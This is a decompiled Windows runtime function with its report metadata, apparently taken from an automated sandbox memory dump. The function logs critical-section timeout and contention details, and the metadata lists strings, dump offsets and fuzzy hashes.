                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
                                                                        				_t7 = E04BCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E04C15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E04C15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}











                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C1FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C1FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C1FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: a1208942c326ec79a1502084c3593ee525d21d0b729456bbce87e665dcd164c8
                                                                        • Instruction ID: 76b1f246a55dfd8134a0a554b0d6dcc5e4bd721d59926b1db668662e91d0bc4c
                                                                        • Opcode Fuzzy Hash: a1208942c326ec79a1502084c3593ee525d21d0b729456bbce87e665dcd164c8
                                                                        • Instruction Fuzzy Hash: ADF0F632200201BFE6251A55DC42F23BF6BEB86730F140358F628561F1EA62F860A6F4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%